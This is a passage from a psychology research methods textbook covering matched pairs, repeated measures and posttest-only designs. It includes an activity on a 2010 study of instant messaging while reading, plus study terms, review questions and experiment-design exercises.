However useful they are, matching procedures can be costly and time-consuming, because they require measuring participants on the matching variable prior to the experiment. Such efforts are worthwhile only when the matching variable is strongly related to the dependent measure and you know that the relationship exists prior to conducting your study. For these reasons, matched pairs is not a commonly used experimental design. However, we will discuss matching again in Chapter 11 when describing quasi-experimental designs that do not have random assignment to conditions. You now have a fundamental understanding of the design of experiments. In the next chapter, we will consider issues that arise when you decide how to actually conduct an experiment.


We are constantly connected. We can be reached by cell phone almost anywhere, at any time. Text messages compete for our attention. Email and instant messaging (IM) can interrupt our attention whenever we are using a cell phone or computer. Is this a problem? Most people like to think of themselves as experts at multitasking. Is that true?

A study conducted by Bowman, Levine, Waite, and Gendron (2010) attempted to determine whether IMing during a reading session affected test performance. In this study, participants were randomly assigned to one of three conditions: one where they were asked to IM prior to reading, one in which they were asked to IM during reading, and one in which IMing was not allowed at all. Afterward, all participants completed a brief test on the material presented in the reading.

First, acquire and read the article:

Bowman, L. L., Levine, L. E., Waite, B. M., & Gendron, M. (2010). Can students really multitask? An experimental study of instant messaging while reading. Computers & Education, 54, 927–931. doi:10.1016/j.compedu.2009.09.024

After reading the article, answer the following questions:

1. This experiment used a posttest-only design. How could the researchers have used a pretest-posttest design? What would the advantages and disadvantages be of using a pretest-posttest design?

2. This experiment used an independent groups design.

a. How could they have used a repeated measures design? What would have been the advantages and disadvantages of using a repeated measures design?

b. How could they have used a matched pairs design? What variables do you think would have been worthwhile to match participants on? What would have been the advantages and disadvantages of using a matched pairs design?

3. What potential confounding variables can you think of?

4. In what way does this study reflect—or not reflect—the reality of studying and test taking in college? That is, how would you evaluate the external validity of this study?

5. How good was the internal validity of this experiment?

6. What were the researchers’ key conclusions of this experiment?

7. Would you have predicted the results obtained in this experiment? Why or why not?

Study Terms

Attrition (also mortality) (p. 166)

Between-subjects design (also independent groups design) (p. 168)

Carryover effect (p. 170)

Confounding variable (p. 162)

Counterbalancing (p. 171)

Fatigue effect (p. 170)

Independent groups design (also between-subjects design) (p. 168)

Internal validity (p. 163)

Latin square (p. 172)

Matched pairs design (p. 174)

Mortality (also attrition) (p. 166)

Order effect (p. 170)

Posttest-only design (p. 163)

Practice effect (also learning effect) (p. 170)

Pretest-posttest design (p. 164)

Random assignment (p. 168)

Repeated measures design (also within-subjects design) (p. 168)

Selection differences (p. 164)

Solomon four-group design (p. 166)

Within-subjects design (also repeated measures design) (p. 168)

Review Questions

1. What is confounding of variables?

2. What is meant by the internal validity of an experiment?

3. How do the two true experimental designs eliminate the problem of selection differences?

4. Distinguish between the posttest-only design and the pretest-posttest design. What are the advantages and disadvantages of each?

5. What is a repeated measures design? What are the advantages of using a repeated measures design? What are the disadvantages?

6. What are some of the ways of dealing with the problems of a repeated measures design?

7. When would a researcher decide to use the matched pairs design? What would be the advantages of this design?

8. The procedure used to obtain your sample (i.e., random or nonrandom sampling) is not the same as the procedure for assigning participants to conditions; distinguish between random sampling and random assignment.


1. Design an experiment to test the hypothesis that single-gender math classes are beneficial to adolescent females. Construct operational definitions of both the independent and dependent variables. Your experiment should have two groups and use the matched pairs procedure. Make a good case for your selection of the matching variable. In addition, defend your choice of either a posttest-only design or a pretest-posttest design.

2. Design a repeated measures experiment that investigates the effect of report presentation style on the grade received for the report. Use two levels of the independent variable: a “professional style” presentation (high-quality paper, consistent use of margins and fonts, carefully constructed tables and charts) and a “nonprofessional style” (average-quality paper, frequent changes in the margins and fonts, tables and charts lacking proper labels). Discuss the necessity for using counterbalancing. Create a table illustrating the experimental design.

3. Professor Foley conducted a cola taste test. Each participant in the experiment first tasted 2 ounces of Coca-Cola, then 2 ounces of Pepsi, and finally 2 ounces of Sam’s Choice Cola. A rating of the cola’s flavor was made after each taste. What are the potential problems with this experimental design and the procedures used? Revise the design and procedures to address these problems. You may wish to consider several alternatives and think about the advantages and disadvantages of each.